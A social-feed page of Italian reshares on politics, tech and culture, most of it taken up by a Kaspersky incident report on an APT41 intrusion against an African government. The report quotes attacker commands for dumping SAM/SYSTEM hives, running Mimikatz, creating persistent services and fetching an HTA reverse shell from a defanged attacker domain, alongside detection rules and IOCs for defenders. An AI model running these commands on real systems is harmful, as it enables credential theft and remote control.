Salta al contenuto principale

friendica (DFRN) - Collegamento all'originale

Perché il software libero è un atto politico

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
L'intervento di Giordano Alborghetti.

startmag.it/innovazione/softwa…

#StartMag @Informatica (Italy e non Italy 😁)

reshared this

in reply to Informa Pirata

Laic Salocin
glitchsoc - Collegamento all'originale
Laic Salocin
Condivido e rinvio al recente video blog di @thelinuxEXP a proposito del cambio di software proprietari per liberi, anche motivati dall'assenza in Europa di alternative valide. Pertanto, il passaggio al libero - che non rappresenta un paese - é motivato perché non vogliamo lasciare nostri dati in America o Cina.
@Nick @ The Linux Experiment

reshared this

friendica (DFRN) - Collegamento all'originale

Server Microsoft flop, tutti i dettagli sull’attacco hacker


@Informatica (Italy e non Italy 😁)
Ieri Microsoft ha dichiarato che erano in corso "attacchi attivi" al suo software server utilizzato da agenzie governative e aziende. Hacker non identificati hanno sfruttato una "vulnerabilità significativa" in SharePoint, software per la condivisione e gestione di documenti di Microsoft,

@Informatica (Italy e non Italy 😁)

reshared this

friendica (DFRN) - Collegamento all'originale
e noi stiamo a discutere se sostenere israele perché sono una "democrazia" "compiuta" e perché loro fanno il gay pride? ma chi sostiene israele vada a cagare... senza se e senza ma.

Fonti mediche, 19 palestinesi morti di fame in 24 ore - Ultima ora - Ansa.it

Almeno 19 palestinesi, inclusa una bambina di quattro anni, sono morti di fame nelle ultime 24 ore a Gaza: lo riportano la Bbc e la Cnn, che citano il portavoce dell'ospedale dei Martiri di al-Aqsa, a Deir al-Balah, nella Striscia di Gaza centrale.
Agenzia ANSA

friendica (DFRN) - Collegamento all'originale
SirJoe Polito – Black & White
freezonemagazine.com/articoli/…
La carriera di un musicista può essere un lungo percorso fatto di ricerca, costanza, fatica, migliaia di chilometri fatti per compensi che quasi mai coprono i costi reali. Ci vuole, diciamolo chiaramente, una grande volontà di restare in quella categoria di “never surrender” che ti fa guadagnare stima e rispetto di ascoltatori, fans, amici. Black […]
L'articolo SirJoe Polito – Black & White provie

friendica (DFRN) - Collegamento all'originale

Scommettete che diranno che sono stati i russi?


Maxi attacco hacker a SharePoint Server: colpite agenzie governative e aziende
Un gruppo di hacker ha sfruttato una vulnerabilità nel software SharePoint Server di Microsoft per lanciare un attacco globale, colpendo agenzie governative statunitensi, università, aziende energetiche e un gruppo di comunicazione asiatico. L’attacco ha interessato installazioni locali del software, non la versione cloud SharePoint Online. Microsoft ha rilasciato un aggiornamento urgente e lavora a ulteriori correzioni. Le autorità di USA, Canada e Australia indagano, con migliaia di server ancora a rischio. L’origine e gli obiettivi del gruppo restano ignoti. Eye Security ha rilevato oltre 50 violazioni, ma i nomi delle vittime sono coperti da accordi di riservatezza.

friendica (DFRN) - Collegamento all'originale

In Valle d’Aosta comincia domani la discussione su “Liberi Subito”

Entra ufficialmente nel calendario dei lavori del Consiglio regionale della Valle d’Aosta la proposta di legge regionale “Liberi Subito”, volta a garantire tempi e procedure certe per l’accesso al suicidio medicalmente assistito, nel rispetto dei principi indicati dalla sentenza 242/2019 della Corte costituzionale.

La discussione della proposta figura infatti nel calendario del Consiglio regionale per i lavori dal 22 al 24 luglio, come punto 12 dell’ordine del giorno e confidiamo che il Consiglio affronti il tema con serietà e responsabilità verso i propri cittadini come già fatto dalla Regione Toscana.

Il testo della proposta, depositato nel febbraio 2024 dalle consigliere regionali di opposizione Erika Guichardaz e Chiara Minelli, ha iniziato l’iter di discussione il 3 luglio dello scorso anno. L’approvazione del testo rappresenterebbe un primo passo per regolamentare, nel rispetto dei principi costituzionali e delle competenze regionali, l’accesso al suicidio medicalmente assistito per le persone che si trovano nelle condizioni definite dalla sentenza 242/2019: persone maggiorenni, capaci di autodeterminarsi, affetti da patologie irreversibili e fonte di sofferenze fisiche o psicologiche intollerabili, tenuti in vita da trattamenti di sostegno vitale.

“A quasi sei anni dalla sentenza 242 – dichiara Marco Cappato – non possiamo accettare che i cittadini debbano ancora affrontare ostacoli, attese e arbitri, pur avendo diritto ad accedere legalmente al suicidio assistito. La proposta “Liberi Subito” si muove nel solco tracciato dalla Corte costituzionale nel rispetto delle competenze regionali. Non introduce quindi un nuovo diritto, ma si limita a regolamentare le procedure sanitarie di accertamento delle condizioni di salute della persona che fa richiesta di accesso alla pratica. Auspichiamo che il Consiglio regionale della Valle d’Aosta, al di là delle appartenenze politiche, dia prova di responsabilità e rispetto per la volontà delle persone malate”.

— Approfondimento: le Regioni coinvolte dalle Proposte di legge sul Fine vita —


La sentenza 242/2019 della Corte costituzionale sul caso Cappato/Antoniani, garantisce l’accesso all’aiuto alla morte volontaria, il cosiddetto “suicidio assistito” nel nostro Paese, individuando determinate condizioni per la persona malata che ne faccia richiesta che devono essere verificate dal Servizio Sanitario Nazionale.

Il Servizio Sanitario però non garantisce tempi certi per effettuare le verifiche e rispondere alle persone malate che hanno diritto di porre fine alla propria vita. Per questo motivo, nel rispetto delle competenze regionali, l’Associazione Luca Coscioni ha promosso a livello nazionale la campagna “Liberi Subito” con raccolta firme per proposte di legge regionali che garantiscano il percorso di richiesta di suicidio medicalmente assistito e i controlli necessari in tempi certi, adeguati e definiti.

➡ Per conoscere lo stato dell’arte delle singole iniziative CLICCA QUI


L'articolo In Valle d’Aosta comincia domani la discussione su “Liberi Subito” proviene da Associazione Luca Coscioni.

friendica (DFRN) - Collegamento all'originale
#NotiziePerLaScuola
È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.
🔶 #Valditara: "Assumeremo oltre 54 mila #docenti per il prossimo anno scolastico".

Ministero dell'Istruzione

#NotiziePerLaScuola È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito. 🔶 #Valditara: "Assumeremo oltre 54 mila #docenti per il prossimo anno scolastico".
Telegram
#docenti #NotiziePerLaScuola #Valditara

friendica (DFRN) - Collegamento all'originale

OT Cybersecurity: non solo una questione di Direttive e di Regolamenti

A cura di Costel Onufrei, Specialized Systems Engineer OT, Fortinet Italy

Oggigiorno è sempre più evidente come le infrastrutture Operational Technology (OT), conseguentemente alla convergenza tra IT e OT e alla loro maggiore complessità, siano in misura crescente esposte a nuovi rischi. Questo porta ad un aumento esponenziale della superficie d’attacco che non guarda più a IT e OT come due mondi separati, ma come un unico singolo bersaglio, aprendo la strada a nuove minacce e vulnerabilità volte a colpire le infrastrutture critiche oltre che il cuore delle realtà industriali, la produzione.

Lo scenario descritto è ulteriormente evidenziato dai dati indicati dal rapporto Clusit 2025, dove il settore manifatturiero ha superato, in termini di attacchi a livello globale, il settore finanziario. Se consideriamo che le infrastrutture OT, per loro stessa natura, sono basate su tecnologie che non possiedono una “security-by-design”, tipicamente obsolete e con poche patch di sicurezza applicate durante il loro prolungato ciclo di vita, si evince come questo contesto sia estremamente critico per la corretta operatività delle organizzazioni che se ne avvalgono.
Costel Onufrei, Specialized Systems Engineer OT, Fortinet Italy
Vista la complessità, da dove si può iniziare? Ponendosi domande concrete su come funziona l’infrastruttura e quali metriche adottare per proteggerla. Analizzando i rischi annessi, si possono individuare le aree che richiedono un intervento più rapido. Tipicamente si parte da alcune domande basilari:

  • Come sono interconnesse le macchine di produzione o gli impianti?
  • Come sono gestite le reti interne degli impianti produzione?
  • Quali dispositivi sono presenti all’interno delle reti OT?
  • Hanno delle vulnerabilità conosciute?
  • Come sono tracciati gli accessi interni ed esterni alle infrastrutture OT?

In questo contesto diventa fondamentale che le aziende affrontino le sfide della sicurezza OT con un approccio basato su standard internazionali e best practice come NIST o ISA/IEC 62443, mettendo in atto:

Visibilità e controllo delle risorse OT: Grazie all’utilizzo di FortiGate Rugged NGFW e servizi dedicati come FortiGuard OT Security Service, ci avvaliamo di 3.300 regole legate a protocolli OT e 750 regole IPS specifiche per ambienti OT, che consentono di mappare in tempo reale l’infrastruttura OT. Il servizio distingue dispositivi legittimi da quelli non autorizzati, offrendo anche oltre 1.500 regole di virtual patching per la protezione dei sistemi legacy da attacchi già riconosciuti e classificati, intercettando e bloccando exploit noti (KEV – Known Exploited Vulnerabilities) prima che raggiungano i dispositivi vulnerabili, proteggendo efficacemente anche i sistemi OT non aggiornabili.

Segmentazione e contenimento: Per ridurre il rischio di intrusioni è richiesto un ambiente OT con controlli di accesso rigorosi tramite policy di rete in tutti i punti di accesso; questo approccio inizia con la creazione di zone e conduits di rete, attuabili con FortiGate Rugged NGFW per il traffico di rete verticale, e ulteriormente ampliabile con FortiSwitch Rugged, consentendo una segmentazione di rete avanzata a livello di porta. Questi switch “rugged”, integrati nativamente con FortiOS, permettono di isolare logicamente linee produttive, accessi remoti e reti IT/OT, contrastando movimenti laterali non autorizzati e semplificando la gestione della sicurezza.

Accesso da remoto sicuro: Permettere a operatori remoti di accedere alle reti OT può essere estremamente vantaggioso in termini di riduzione dei tempi di fermo e rapidità d’intervento, bisogna però implementare soluzioni di accesso da remoto che abbiano funzioni di sicurezza integrate: FortiPAM, FortiSRA (ora aggiornato con nuove funzionalità di gestione delle credenziali e dei segreti per ambienti OT), insieme a FortiClient e FortiToken, integrabili grazie alla Fortinet Security Fabric, ci aiutano a mettere le basi per un accesso remoto protetto, controllato e tracciabile anche in scenari distribuiti o estremamente sensibili.

Integrazione e orchestrazione: La Fortinet OT Security Platform si integra nella Fortinet Security Fabric per consentire facilmente la convergenza e la connettività delle IT/OT. Questo aiuta ad aumentare la visibilità e la risposta in tempo reale sull’intera superficie di attacco e consente ai team Security Operations Center (SOC) di diventare più efficienti ed efficaci nei tempi di risposta in fabbriche, impianti, sedi remote.

Una best practice che ha effetti positivi: il rapporto Fortinet
Il Global 2025 State of Operational Technology and Cybersecurity Report di Fortinet evidenzia una riduzione rilevante del numero di vendor di dispositivi OT, indicatore di maggiore maturità ed efficienza operativa. Oggi, il 78% delle organizzazioni utilizza solo da uno a quattro fornitori OT, a dimostrazione di un processo di consolidamento.

Il consolidamento dei vendor di cybersecurity è sintomo di maturità, coerente con quanto osservato tra i clienti Fortinet che adottano la piattaforma Fortinet OT Security. L’unificazione di rete e sicurezza nei siti OT remoti ha migliorato la visibilità e ridotto i rischi cyber, portando a una riduzione del 93% degli incidenti rispetto a una rete piatta. Le soluzioni semplificate di Fortinet, inoltre, hanno consentito un miglioramento delle performance pari a 7 volte, grazie alla riduzione dei tempi di triage e configurazione.

È fondamentale proseguire in questa direzione: la protezione degli ambienti industriali non è più una questione tecnica, ma un tema di business continuity, reputazione e competitività.

Per saperne di più sullo stato della sicurezza OT nel 2025, leggi il rapporto completo di Fortinet.

L'articolo OT Cybersecurity: non solo una questione di Direttive e di Regolamenti proviene da il blog della sicurezza informatica.

friendica (DFRN) - Collegamento all'originale

Il Codice di Camaldoli, dalla newsletter "La buona storia" di Andrea Bosio

L’incontro di un gruppo di intellettuali dell’area cattolica, estranei al fascismo, si svolse nel monastero di Camaldoli (Ar) dal 18 al 24 luglio.
La riunione, presentata come una delle molte “settimane teologiche”, era stata organizzata da un gruppo di laici impegnati nel settore economico, in particolare Sergio Paronetto e Pasquale Saraceno, coordinati da Adriano Bernareggi, vescovo di Bergamo.
Il dibattito avrebbe portato, nel giro di due anni, alla stesura di un documento: "Per la comunità cristiana. Principi dell’ordinamento sociale, a cura di un gruppo di studiosi amici di Camaldoli".
Con questo titolo raggiunse le stampe nell’aprile del 1945 il testo che oggi è ricordato come "Codice di Camaldoli".

#codicedicamaldoli

@Storia


#5 - Il Codice di Camaldoli

Quando un pezzo di Costituzione fu scritto in un monastero durante la guerra
Andrea Bosio (La buona storia)
#codicedicamaldoli @Storia

Storia reshared this.

friendica (DFRN) - Collegamento all'originale

Governance, Risk & Compliance (GRC): ecco le principali certificazioni professionali


@Informatica (Italy e non Italy 😁)
La mappa delle principali certificazioni professionali in ambito Governance, Risk & Compliance (GRC). Le credenziali più accreditate, nel contesto del framework ECSF di Enisa e della nuova Direttiva NIS2, aiutano i professionisti

@Informatica (Italy e non Italy 😁)

friendica (DFRN) - Collegamento all'originale

RISERVA MA NON PER HOBBY E QUANDO?

@Informatica (Italy e non Italy 😁)

Non è cosa da affrontare “in maniera hobbistica” l’istituzione di una Riserva ausiliaria militare dello Stato...
L'articolo RISERVA MA NON PER HOBBY E QUANDO? proviene da GIANO NEWS.
#DIFESA

#Difesa @Informatica (Italy e non Italy 😁)

friendica (DFRN) - Collegamento all'originale
Ormai non hanno più argomenti sono disperati, se l'UE è un disastro e la VDL è odiata, la colpa è di Putin.
Le comiche finali

friendica (DFRN) - Collegamento all'originale

Rumble in the jungle: APT41’s new target in Africa


Introduction


Some time ago, Kaspersky MDR analysts detected a targeted attack against government IT services in the African region. The attackers used hardcoded names of internal services, IP addresses, and proxy servers embedded within their malware. One of the C2s was a captive SharePoint server within the victim’s infrastructure.

During our incident analysis, we were able to determine that the threat actor behind the activity was APT41. This is a Chinese-speaking cyberespionage group known for targeting organizations across multiple sectors, including telecom and energy providers, educational institutions, healthcare organizations and IT energy companies in at least 42 countries. It’s worth noting that, prior to the incident, Africa had experienced the least activity from this APT.

Incident investigation and toolkit analysis

Detection


Our MDR team identified suspicious activity on several workstations within an organization’s infrastructure. These were typical alerts indicating the use of the WmiExec module from the Impacket toolkit. Specifically, the alerts showed the following signs of the activity:

  • A process chain of svchost.exe ➔exe ➔ cmd.exe
  • The output of executed commands being written to a file on an administrative network share, with the file name consisting of numbers separated by dots:

WmiExec process tree
WmiExec process tree

The attackers also leveraged the Atexec module from the Impacket toolkit.

Scheduler tasks created by Atexec
Scheduler tasks created by Atexec

The attackers used these commands to check the availability of their C2 server, both directly over the internet and through an internal proxy server within the organization.

The source of the suspicious activity turned out to be an unmonitored host that had been compromised. Impacket was executed on it in the context of a service account. We would later get that host connected to our telemetry to pinpoint the source of the infection.

After the Atexec and WmiExec modules finished running, the attackers temporarily suspended their operations.

Privilege escalation and lateral movement


After a brief lull, the attackers sprang back into action. This time, they were probing for running processes and occupied ports:
cmd.exe /c netstat -ano > C:\Windows\temp\temp_log.log
cmd.exe /c tasklist /v > C:\Windows\temp\temp_log.log
They were likely trying to figure out if the target hosts had any security solutions installed, such as EDR, MDR or XDR agents, host administration tools, and so on.

Additionally, the attackers used the built-in reg.exe utility to dump the SYSTEM and SAM registry hives.
cmd.exe /c reg save HKLM\SAM C:\Windows\temp\temp_3.log
cmd.exe /c reg save HKLM\SYSTEM C:\Windows\temp\temp_4.log
On workstations connected to our monitoring systems, our security solution blocked the activity, which resulted in an empty dump file. However, some hosts within the organization were not secured. As a result, the attackers successfully harvested credentials from critical registry hives and leveraged them in their subsequent attacks. This underscores a crucial point: to detect incidents promptly and minimize damage, security solution agents must be installed on all workstations across the organization without exception. Furthermore, the more comprehensive your telemetry data, the more effective your response will be. It’s also crucial to keep a close eye on the permissions assigned to service and user accounts, making sure no one ends up with more access rights than they really need. This is especially true for accounts that exist across multiple hosts in your infrastructure.

In the incident we’re describing here, two domain accounts obtained from a registry dump were leveraged for lateral movement: a domain account with local administrator rights on all workstations, and a backup solution account with domain administrator privileges. The local administrator privileges allowed the attackers to use the SMB protocol to transfer tools for communicating with the C2 to the administrative network share C$. We will discuss these tools – namely Cobalt Strike and a custom agent – in the next section.

In most cases, the attackers placed their malicious tools in the C:\WINDOWS\TASKS\ directory on target hosts, but they used other paths too:
c:\windows\tasks\
c:\programdata\
c:\programdata\usoshared\
c:\users\public\downloads\
c:\users\public\
c:\windows\help\help\
c:\users\public\videos\
Files from these directories were then executed remotely using the WMI toolkit:

Lateral movement via privileged accounts
Lateral movement via privileged accounts

C2 communication
Cobalt Strike


The attackers used Cobalt Strike for C2 communication on compromised hosts. They distributed the tool as an encrypted file, typically with a TXT or INI extension. To decrypt it, they employed a malicious library injected into a legitimate application via DLL sideloading.

Here’s a general overview of how Cobalt Strike was launched:

Attackers placed all the required files – the legitimate application, the malicious DLL, and the payload file – in one of the following directories:
C:\Users\Public\
C:\Users\{redacted}\Downloads\
C:\Windows\Tasks\
The malicious library was a legitimate DLL modified to search for an encrypted Cobalt Strike payload in a specifically named file located in the same directory. Consequently, the names of the payload files varied depending on what was hardcoded into the malicious DLL.

During the attack, the threat actor used the following versions of modified DLLs and their corresponding payloads:

Legitimate file nameDLLEncrypted Cobalt Strike
TmPfw.exeTmDbg64.dllTmPfw.ini
cookie_exporter.exemsedge.dllLogs.txt
FixSfp64.exelog.dllLogs.txt
360DeskAna64.exeWTSAPI32.dllconfig.ini
KcInst.exeKcInst32.dllkcinst.log
MpCmdRunq.exempclient.dllLogs.txt

Despite using various legitimate applications to launch Cobalt Strike, the payload decryption process was similar across instances. Let’s take a closer look at one example of Cobalt Strike execution, using the legitimate file cookie_exporter.exe, which is part of Microsoft Edge. When launched, this application loads msedge.dll, assuming it’s in the same directory.

The attackers renamed cookie_exporter.exe to Edge.exe and replaced msedge.dll with their own malicious library of the same name.

When any dynamic library is loaded, the DllEntryPoint function is executed first. In the modified DLL, this function included a check for a debugging environment. Additionally, upon its initial execution, the library verified the language packs installed on the host.. The malicious code would not run if it detected any of the following language packs:

  • Japanese (Japan)
  • Korean (South Korea)
  • Chinese (Mainland China)
  • Chinese (Taiwan)

If the system passes the checks, the application that loaded the malicious library executes an exported DLL function containing the malicious code. Because different applications were used to launch the library in different cases, the exported functions vary depending on what the specific software calls. For example, with msedge.dll, the malicious code was implemented in the ShowMessageWithString function, called by cookie_exporter.exe.

The ShowMessageWithString function retrieves its payload from Logs.txt, a file located in the same directory. These filenames are typically hardcoded in the malicious dynamic link libraries we’ve observed.

The screenshot below shows a disassembled code segment responsible for loading the encrypted file. It clearly reveals the path where the application expects to find the file.

The payload is decrypted by repeatedly executing the following instructions using 128-bit SSE registers:

Once the payload is decrypted, the malicious executable code from msedge.dll launches it by using a standard method: it allocates a virtual memory region within its own process, then copies the code there and executes it by creating a new thread. In other versions of similarly distributed Cobalt Strike agents that we examined, the malicious code could also be launched by creating a new process or upon being injected into the memory of another running process.

Beyond the functionality described above, we also found a code segment within the malicious libraries that appeared to be a message to the analyst. These strings are supposed to be displayed if the DLL finds itself running in a debugger, but in practice this doesn’t occur.

Once Cobalt Strike successfully launches, the implant connects to its C2 server. Threat actors then establish persistence on the compromised host by creating a service with a command similar to this:
C:\Windows\system32\cmd.exe /C sc create "server power" binpath= "cmd /c start C:\Windows\tasks\Edge.exe" && sc description "server power" "description" && sc config "server power" start= auto && net start "server power"
Attackers often use the following service names for embedding Cobalt Strike:
server power
WindowsUpdats
7-zip Update

Agent


During our investigation, we uncovered a compromised SharePoint server that the attackers were using as the C2. They distributed files named agents.exe and agentx.exe via the SMB protocol to communicate with the server. Each of these files is actually a C# Trojan whose primary function is to execute commands it receives from a web shell named CommandHandler.aspx, which is installed on the SharePoint server. The attackers uploaded multiple versions of these agents to victim hosts. All versions had similar functionality and used a hardcoded URL to retrieve commands:

The agents executed commands from CommandHandler.aspx using the cmd.exe command shell launched with the /c flag.

While analyzing the agents, we didn’t find significant diversity in their core functionality, despite the attackers constantly modifying the files. Most changes were minor, primarily aimed at evading detection. Outdated file versions were removed from the compromised hosts.

The attackers used the deployed agents to conduct reconnaissance and collect sensitive data, such as browser history, text files, configuration files, and documents with .doc, .docx and .xlsx extensions. They exfiltrated the data back to the SharePoint server via the upload.ashx web shell.

It is worth noting that the attackers made some interesting mistakes while implementing the mechanism for communicating with the SharePoint server. Specifically, if the CommandHandler.aspx web shell on the server was unavailable, the agent would attempt to execute the web page’s error message as a command:


Obtaining a command shell: reverse shell via an HTA file


If, after their initial reconnaissance, the attackers deemed an infected host valuable for further operations, they’d try to establish an alternative command-shell access. To do this, they executed the following command to download from an external resource a malicious HTA file containing an embedded JavaScript script and run this file:
"cmd.exe" /c mshta hxxp[:]//github.githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta
The group attempted to mask their malicious activity by using resources that mimicked legitimate ones to download the HTA file. Specifically, the command above reached out to the GitHub-impersonating domain github[.]githubassets[.]net. The attackers primarily used the site to host JavaScript code. These scripts were responsible for delivering either the next stage of their malware or the tools needed to further the attack.

At the time of our investigation, a harmless script was being downloaded from github[.]githubassets[.]net instead of a malicious one. This was likely done to hide the activity and complicate attack analysis.

The harmless script found on github[.]githubassets[.]net
The harmless script found on github[.]githubassets[.]net

However, we were able to obtain and analyze previously distributed scripts, specifically the malicious file 2CD15977B72D5D74FADEDFDE2CE8934F. Its primary purpose is to create a reverse shell on the host, giving the attackers a shell for executing their commands.
Once launched, the script gathers initial host information:

It then connects to the C2 server, also located at github[.]githubassets[.]net, and transmits a unique ATTACK_ID along with the initially collected data. The script leverages various connection methods, such as WebSockets, AJAX, and Flash. The choice depends on the capabilities available in the browser or execution environment.


Data collection


Next, the attackers utilized automation tools such as stealers and credential-harvesting utilities to collect sensitive data. We detail these tools below. Data gathered by these utilities was also exfiltrated via the compromised SharePoint server. In addition to the aforementioned web shell, the SMB protocol was used to upload data to the server. The files were transferred to a network share on the SharePoint server.

Pillager


A modified version of the Pillager utility stands out among the tools the attackers deployed on hosts to gather sensitive information. This tool is used to export and decrypt data from the target computer. The original Pillager version is publicly available in a repository, accompanied by a description in Chinese.

The primary types of data collected by this utility include:

  • Saved credentials from browsers, databases, and administrative utilities like MobaXterm
  • Project source code
  • Screenshots
  • Active chat sessions and data
  • Email messages
  • Active SSH and FTP sessions
  • A list of software installed on the host
  • Output of the systeminfo and tasklist commands
  • Credentials stored and used by the operating system, and Wi-Fi network credentials
  • Account information from chat apps, email clients, and other software

A sample of data collected by Pillager:

The utility is typically an executable (EXE) file. However, the attackers rewrote the stealer’s code and compiled it into a DLL named wmicodegen.dll. This code then runs on the host via DLL sideloading. They chose convert-moftoprovider.exe, an executable from the Microsoft SDK toolkit, as their victim application. It is normally used for generating code from Managed Object Format (MOF) files.

Despite modifying the code, the group didn’t change the stealer’s default output file name and path: C:\Windows\Temp\Pillager.zip.

It’s worth noting that the malicious library they used was based on the legitimate SimpleHD.dll HDR rendering library from the Xbox Development Kit. The source code for this library is available on GitHub. This code was modified so that convert-moftoprovider.exe loaded an exported function, which implemented the Pillager code.

Interestingly, the path to the PDB file, while appearing legitimate, differs by using PS5 instead of XBOX:

Checkout


The second stealer the attackers employed was Checkout. In addition to saved credentials and browser history, it also steals information about downloaded files and credit card data saved in the browser.

When launching the stealer, the attackers pass it a j8 parameter; without it, the stealer won’t run. The malware collects data into CSV files, which it then archives and saves as CheckOutData.zip in a specially created directory named CheckOut.

Data collection and archiving in Checkout
Data collection and archiving in Checkout

Checkout launch diagram in Kaspersky Threat Intelligence Platform
Checkout launch diagram in Kaspersky Threat Intelligence Platform

RawCopy


Beyond standard methods for gathering registry dumps, such as using reg.exe, the attackers leveraged the publicly available utility RawCopy (MD5 hash: 0x15D52149536526CE75302897EAF74694) to copy raw registry files.

RawCopy is a command-line application that copies files from NTFS volumes using a low-level disk reading method.

The following commands were used to collect registry files:
c:\users\public\downloads\RawCopy.exe /FileNamePath:C:\Windows\System32\Config\system /OutputPath:c:\users\public\downloads
c:\users\public\downloads\RawCopy.exe /FileNamePath:C:\Windows\System32\Config\sam /OutputPath:c:\users\public\downloads
c:\users\public\downloads\RawCopy.exe /FileNamePath:C:\Windows\System32\Config\security /OutputPath:c:\users\public\downloads

Mimikatz


The attackers also used Mimikatz to dump account credentials. Like the Pillager stealer, Mimikatz was rewritten and compiled into a DLL. This DLL was then loaded by the legitimate java.exe file (used for compiling Java code) via DLL sideloading. The following files were involved in launching Mimikatz:
C:\Windows\Temp\123.bat
C:\Windows\Temp\jli.dll
C:\Windows\Temp\java.exe
С:\Windows\Temp\config.ini
123.bat is a BAT script containing commands to launch the legitimate java.exe executable, which in turn loads the dynamic link library for DLL sideloading. This DLL then decrypts and executes the Mimikatz configuration file, config.ini, which is distributed from a previously compromised host within the infrastructure.
java.exe privilege::debug token::elevate lsadump::secrets exit

Retrospective threat hunting


As already mentioned, the victim organization’s monitoring coverage was initially patchy. Because of this, in the early stages, we only saw the external IP address of the initial source and couldn’t detect what was happening on that host. After some time, the host was finally connected to our monitoring systems, and we found that it was an IIS web server. Furthermore, despite the lost time, it still contained artifacts of the attack.

These included the aforementioned Cobalt Strike implant located in c:\programdata\, along with a scheduler task for establishing persistence on the system. Additionally, a web shell remained on the host, which our solutions detected as HEUR:Backdoor.MSIL.WebShell.gen. This was found in the standard temporary directory for compiled ASP.NET application files:
c:\windows\microsoft.net\framework64\v4.0.30319\temporary asp.net files\root\dedc22b8\49ac6571\app_web_hdmuushc.dll
MD5: 0x70ECD788D47076C710BF19EA90AB000D
These temporary files are automatically generated and contain the ASPX page code:

The web shell was named newfile.aspx. The screenshot above shows its function names. Based on these names, we were able to determine that this instance utilized a Neo-reGeorg web shell tunnel.

This tool is used to proxy traffic from an external network to an internal one via an externally accessible web server. Thus, the launch of the Impacket tools, which we initially believed was originating from a host unidentified at the time (the IIS server), was in fact coming from the external network through this tunnel.

Attribution

We attribute this attack to APT41 with a high degree of confidence, based on the similarities in the TTPs, tooling, and C2 infrastructure with other APT41 campaigns. In particular:

  • The attackers used a number of tools characteristic of APT41, such as Impacket, WMI, and Cobalt Strike.
  • The attackers employed DLL sideloading techniques.
  • During the attack, various files were saved to C:\Windows\Temp.
  • The C2 domain names identified in this incident (s3-azure.com, *.ns1.s3-azure.com, *.ns2.s3-azure.com) are similar to domain names previously observed in APT41 attacks (us2[.]s3bucket-azure[.]online, status[.]s3cloud-azure[.]com).


Takeaways and lessons learned


The attackers wield a wide array of both custom-built and publicly available tools. Specifically, they use penetration testing tools like Cobalt Strike at various stages of an attack. The attackers are quick to adapt to their target’s infrastructure, updating their malicious tools to account for specific characteristics. They can even leverage internal services for C2 communication and data exfiltration. The files discovered during the investigation indicate that the malicious actor modifies its techniques during an attack to conceal its activities – for example, by rewriting executables and compiling them as DLLs for DLL sideloading.

While this story ended relatively well – we ultimately managed to evict the attackers from the target organization’s systems – it’s impossible to counter such sophisticated attacks without a comprehensive knowledge base and continuous monitoring of the entire infrastructure. For example, in the incident at hand, some assets weren’t connected to monitoring systems, which prevented us from seeing the full picture immediately. It’s also crucial to maintain maximum coverage of your infrastructure with security tools that can automatically block malicious activity in the initial stages. Finally, we strongly advise against granting excessive privileges to accounts, and especially against using such accounts on all hosts across the infrastructure.

Appendix

Rules
Yara

rule neoregeorg_aspx_web_shell
{
meta:
description = "Rule to detect neo-regeorg based ASPX web-shells"
author = "Kaspersky"
copyright = "Kaspersky"
distribution = "DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM"

strings:
$func1 = "FrameworkInitialize" fullword
$func2 = "GetTypeHashCode" fullword
$func3 = "ProcessRequest" fullword
$func4 = "__BuildControlTree"
$func5 = "__Render__control1"

$str1 = "FAIL" nocase wide
$str2 = "Port close" nocase wide
$str3 = "Port filtered" nocase wide
$str4 = "DISCONNECT" nocase wide
$str5 = "FORWARD" nocase wide

condition:
uint16(0) == 0x5A4D and
filesize < 400000 and
3 of ($func*) and
3 of ($str*)
}

Sigma

title: Service Image Path Start From CMD
id: faf1e809-0067-4c6f-9bef-2471bd6d6278
status: test
description: Detects creation of unusual service executable starting from cmd /c using command line
references:
- tbd
tags:
- attack.persistence
- attack.T1543.003
author: Kaspersky
date: 2025/05/15
logsource:
product: windows
service: security
detection:
selection:
EventID: 4697
ServiceFileName|contains:
- '%COMSPEC%'
- 'cmd'
- 'cmd.exe'
ServiceFileName|contains|all:
- '/c'
- 'start'
condition: selection
falsepositives:
- Legitimate
level: medium

IOCs
Files


2F9D2D8C4F2C50CC4D2E156B9985E7CA
9B4F0F94133650B19474AF6B5709E773
A052536E671C513221F788DE2E62316C
91D10C25497CADB7249D47AE8EC94766
C3ED337E2891736DB6334A5F1D37DC0F
9B00B6F93B70F09D8B35FA9A22B3CBA1
15097A32B515D10AD6D793D2D820F2A8
A236DCE873845BA4D3CCD8D5A4E1AEFD
740D6EB97329944D82317849F9BBD633
C7188C39B5C53ECBD3AEC77A856DDF0C
3AF014DB9BE1A04E8B312B55D4479F69
4708A2AE3A5F008C87E68ED04A081F18
125B257520D16D759B112399C3CD1466
C149252A0A3B1F5724FD76F704A1E0AF
3021C9BCA4EF3AA672461ECADC4718E6
F1025FCAD036AAD8BF124DF8C9650BBC
100B463EFF8295BA617D3AD6DF5325C6
2CD15977B72D5D74FADEDFDE2CE8934F
9D53A0336ACFB9E4DF11162CCF7383A0
27F506B198E7F5530C649B6E4860C958

Domains and IPs


47.238.184[.]9
38.175.195[.]13
hxxp://github[.]githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta
hxxp://chyedweeyaxkavyccenwjvqrsgvyj0o1y.oast[.]fun/aaa
hxxp://toun[.]callback.red/aaa
hxxp://asd.xkx3[.]callback.[]red
hxxp[:]//ap-northeast-1.s3-azure[.]com
hxxps[:]//www[.]msn-microsoft[.]org:2053
hxxp[:]//www.upload-microsoft[.]com
s3-azure.com
*.ns1.s3-azure.com
*.ns2.s3-azure.com
upload-microsoft[.]com
msn-microsoft[.]org

MITRE ATT&CK
TacticTechniqueID
Initial AccessValid Accounts: Domain AccountsT1078.002
Exploit Public-Facing ApplicationT1190
ExecutionCommand and Scripting Interpreter: PowerShellT1059.001
Command and Scripting Interpreter: Windows Command ShellT1059.003
Scheduled Task/Job: Scheduled TaskT1053.005
Windows Management InstrumentationT1047
PersistenceCreate or Modify System Process: Windows ServiceT1543.003
Hijack Execution Flow: DLL Side-LoadingT1574.002
Scheduled Task/Job: Scheduled TaskT1053.005
Valid Accounts: Domain AccountsT1078.002
Web ShellT1505.003
IIS ComponentsT1505.004
Privilege EscalationCreate or Modify System Process: Windows ServiceT1543.003
Hijack Execution Flow: DLL Side-LoadingT1574.002
Process InjectionT1055
Scheduled Task/Job: Scheduled TaskT1053.005
